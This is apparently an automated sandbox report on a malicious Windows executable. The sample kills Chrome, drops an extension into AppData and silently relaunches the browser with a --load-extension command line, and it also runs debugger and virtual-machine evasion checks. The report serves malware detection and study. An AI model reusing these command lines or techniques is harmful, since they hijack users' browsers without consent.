Edit tour

Windows Analysis Report
Your File Is Ready To Download.exe

Overview

General Information

Sample name:	Your File Is Ready To Download.exe
Analysis ID:	1583876
MD5:	c350eacfe1e1e28295eb961af91e70f8
SHA1:	bca71c098aadb35a4e94f1f68d239eab1d11f52a
SHA256:	0b0dbc8833cc08b6d44607278f7945b015c23dcfd2531cd5fe38b5dc65d28f5b
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Machine Learning detection for sample

Modifies Chrome's extension installation force list

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after checking a module file name)

Installs a Chrome extension

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Sigma detected: Chromium Browser Instance Executed With Custom Extension

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w11x64_office

Your File Is Ready To Download.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\Your File Is Ready To Download.exe" MD5: C350EACFE1E1E28295EB961AF91E70F8)

chrome.exe (PID: 3356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)

taskkill.exe (PID: 7728 cmdline: /IM chrome.exe MD5: 0696086690D7B673C64A7CAD8CD58F7D)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

chrome.exe (PID: 8528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 8720 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)

taskkill.exe (PID: 8084 cmdline: /F /IM chrome.exe /T MD5: 0696086690D7B673C64A7CAD8CD58F7D)

conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cleanup

Sigma Signatures

Sigma detected: Chromium Browser Instance Executed With Custom Extension

Source: Process started

Author: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble, CommandLine|base64offset|contains: Zv, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Your File Is Ready To Download.exe", ParentImage: C:\Users\user\Desktop\Your File Is Ready To Download.exe, ParentProcessId: 8136, ParentProcessName: Your File Is Ready To Download.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble, ProcessId: 8528, ProcessName: chrome.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://getfiles.wiki/welcome.php%s	Avira URL Cloud: Label: malware
Source: https://getfiles.wiki/welcome.php	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Your File Is Ready To Download.exe

ReversingLabs: Detection: 70%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Machine Learning detection for sample

Source: Your File Is Ready To Download.exe

Joe Sandbox ML: detected

Source: Your File Is Ready To Download.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Your File Is Ready To Download.exe

Static PE information: certificate valid

Source: Your File Is Ready To Download.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 0_2_00911780 SHGetKnownFolderPath,SHGetSpecialFolderPathW,GetFileAttributesW,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,Sleep,ShellExecuteW,GetFileAttributesW,Sleep,Sleep,Sleep,

0_2_00911780

Source: chrome.exe

Memory has grown: Private usage: 6MB later: 34MB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: getfiles.wiki

Source: Your File Is Ready To Download.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Your File Is Ready To Download.exe, Your File Is Ready To Download.exe, 00000000.00000002.11892532407.0000000000984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.php
Source: Your File Is Ready To Download.exe, 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.php%s
Source: Your File Is Ready To Download.exe	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54544
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54545
Source: unknown	Network traffic detected: HTTP traffic on port 54545 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54544 -> 443

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 0_2_00917BA3

0_2_00917BA3

Source: Your File Is Ready To Download.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Your File Is Ready To Download.exe, 00000000.00000002.11892532407.00000000009CD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBp

Source: classification engine

Classification label: mal68.phis.winEXE@33/4@2/1

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

File created: C:\Users\user\AppData\Local\ServiceApp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: path	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: version	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: open	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: Default	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: %s\chrome.crx	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: path	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: 1.0	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: version	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: path	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: 1.0	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: version	0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Command line argument: open	0_2_00911780

Source: Your File Is Ready To Download.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Your File Is Ready To Download.exe

ReversingLabs: Detection: 70%

Source: Your File Is Ready To Download.exe	String found in binary or memory: %s\ServiceApp\apps-helper\manifest.json
Source: Your File Is Ready To Download.exe	String found in binary or memory: %s\ServiceApp\apps-helper\chrome.crx
Source: Your File Is Ready To Download.exe	String found in binary or memory: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble
Source: Your File Is Ready To Download.exe	String found in binary or memory: %s\ServiceApp\apps-helper
Source: Your File Is Ready To Download.exe	String found in binary or memory: %s\ServiceApp\apps-helper\service.js
Source: Your File Is Ready To Download.exe	String found in binary or memory: %s\ServiceApp\apps-helper\web.js

Source: unknown	Process created: C:\Users\user\Desktop\Your File Is Ready To Download.exe "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Your File Is Ready To Download.exe

Static PE information: certificate valid

Source: Your File Is Ready To Download.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Your File Is Ready To Download.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Your File Is Ready To Download.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Your File Is Ready To Download.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Your File Is Ready To Download.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Your File Is Ready To Download.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 0_2_00911050 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,

0_2_00911050

Source: Your File Is Ready To Download.exe

Static PE information: real checksum: 0x3b2b2 should be: 0x35956

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 0_2_00914921 push ecx; ret

0_2_00914934

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe	Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble			Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

0_2_00911050

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\TIP\AggregateResults data

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-8907

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

0_2_00911780

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 0_2_0091213C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0091213C

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

0_2_00911050

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 0_2_00919C92 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00919C92
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 0_2_0091365F SetUnhandledExceptionFilter,	0_2_0091365F
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 0_2_0091213C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0091213C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 0_2_00912775 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00912775

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php			Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble			Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe			Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T			Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 0_2_00911430 cpuid

0_2_00911430

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: GetLocaleInfoA,

0_2_0091A67F

